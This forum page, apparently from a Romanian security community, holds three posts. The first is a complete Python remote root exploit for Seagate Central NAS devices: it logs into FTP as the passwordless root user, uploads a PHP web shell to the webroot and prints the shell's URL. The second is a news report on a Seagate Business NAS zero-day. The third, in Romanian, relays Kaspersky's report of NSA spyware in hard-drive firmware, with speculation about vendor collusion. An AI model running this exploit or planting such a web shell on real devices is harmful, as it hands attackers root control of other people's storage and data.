Search the Community

#!/usr/bin/python # seagate_ftp_remote_root.py # # Seagate Central Remote Root Exploit # # Jeremy Brown [jbrown3264/gmail] # May 2015 # # -Synopsis- # # Seagate Central by default has a passwordless root account (and no option to change it). # One way to exploit this is to log into it's ftp server and upload a php shell to the webroot. # From there, we can execute commands with root privileges as lighttpd is also running as root. # # -Fixes- # # Seagate scheduled it's updates to go live on April 28th, 2015. # # Tested Firmware Version: 2014.0410.0026-F # import sys from ftplib import FTP port = 21 php_shell = """ <?php if(isset($_REQUEST['cmd'])) { $cmd = ($_REQUEST["cmd"]); echo "<pre>$cmd</pre>"; system($cmd); } ?> """ php_shell_filename = "shell.php" seagate_central_webroot = "/cirrus/" def main(): if(len(sys.argv) < 2): print("Usage: %s <host>" % sys.argv[0]) return host = sys.argv[1] try: with open(php_shell_filename, 'w') as file: file.write(php_shell) except Exception as error: print("Error: %s" % error); return try: ftp = FTP(host) ftp.login("root") ftp.storbinary("STOR " + seagate_central_webroot + php_shell_filename, open(php_shell_filename, 'rb')) ftp.close() except Exception as error: print("Error: %s" % error); return print("Now surf on over to http://%s%s%s for the php root shell" % (host, seagate_central_webroot, php_shell_filename)) return if __name__ == "__main__": main() Sursa > https://dl.packetstormsecurity.net/1506-exploits/seagate_ftp_remote_root.py.txt

Seagate, over the weekend, confirmed the zero-day vulnerability in its Seagate Business Storage 2-Bay NAS boxes disclosed March 1. But in the same breath, told customers exposed to the vulnerability that a patch is still two months away. “For those customers who choose to keep their networks open, Seagate will be issuing a software patch for download expected May 2015,” said a statement emailed to Threatpost. Seagate said that after analyzing the vulnerability, it has determined the zero-day to be low risk because it affects only those customers to expose the NAS boxes to the Internet. “With factory settings, Business NAS products are not vulnerable. The user has to intentionally change a default setting to become susceptible,” Seagate said. Seagate has built a website for concerned customers with instructions on how to mitigate exposure, and encouraged users to put the NAS boxes behind a firewall when using them exclusively on internal networks. The vulnerability was publicly disclosed a week ago Sunday by Australian security consultancy Beyond Binary after five months of dialogue with Seagate that failed to produce a security update for the firmware issue in question, the researchers said. Beyond Binary said it used a Shodan scan to find 2,500 vulnerable devices exposed to the Internet. Beyond Binary said Seagate boxes running firmware version up to and including 2014.00319 are vulnerable and exploitable without authorization. The issue stems from a number of outdated components upon which the NAS products’ web-based management application is built. The app is used to manage files, access control and user accounts. The outdated components include versions of PHP and Lighttpd from 2010 and a version of CodeIgniter from late 2011; all of which have their own set of vulnerabilities that have been addressed in later versions of the respective components. Hackers can abuse each of these to lace the code with additional files and executables, or extract an encryption key to open up new avenues of attack, Beyond Binary said. The custom web app is not without its issues too as it stores information relevant to a user session inside a session cookie rather than on the webserver. Some of those values include the name of the user, whether they’re an admin and the language. “The fact that a static session encryption key is in use across all instances of the NAS means that once a user has a valid session cookie on one instance, they can apply that same cookie directly to another instance and acquire the same level of access,” the advisory said. “In short, once a user is logged in as admin on one instance, they’re effectively admin on every instance.” Source

Compania rusa de securitate cibernetica Kaspersky a descoperit un program de spionaj american pus in HDD-urile Seagate si Western Digital. In ultimii 5 ani piata HDD-urilor a vazut cateva modificari importante si numarul a scazut de la 3 producatori la 2. Din acest motiv umbla cateva suspiciuni. In prezent avem doi mari producatori americani: Seagate si WD. La randul lor acestia au preluat si alte divizii precum Hitachi, Samsung, Toshiba sau HGST. Potrivit Kaspersky, agentia americana de supraveghere cibernetica NSA a introdus in HDD-uri un cod de spionaj. Acesta executa datele primare, fisierele la nivel inalt, sistemul de operare sau chiar utilizarea HDD-ului. Kasperky a gasit in PC-uri din peste 30 de tari acest program de spionaj, iar cele mai multe au fost in Iran, Rusia, Pakistan, Afganistan, China, Mali, Siria, Yemen si Algeria. Ha! Seagate si WD au negat partajarea codului cu sursa firmware-ului cu orice agentie guvernamentala si au sustinut ca firmware-ul lor este proiectat pentru a preveni sustragerea datelor pe o cale nefireasca. kaspersky a afirmat ca este destul de usor pentru agentii sa obtina codul sursa al software-ulu dandu-se drept un dezvoltator de software. Guvernul poate solicita codul sursa prin simpla rugaminte a unui producator care are nevoie pentru a inspecta codul pentru a se asigura ca este curat, inainte de a putea cumpara PC-uri care ruleaz HDD-urile lor. Ceea ce este surprinzator este modul în care a fost violat firmware-ul HDD-urilor si cum a ajuns raspandit atat de repede. Seagate si WD au facilitati de productie în tari precum Thailanda si China, situate în zone de înalta securitate pentru a preveni furtul de proprietate intelectuala sau sabotaj. Nu ne putem imagina firmware modificat fara o colaborare a companiilor. Source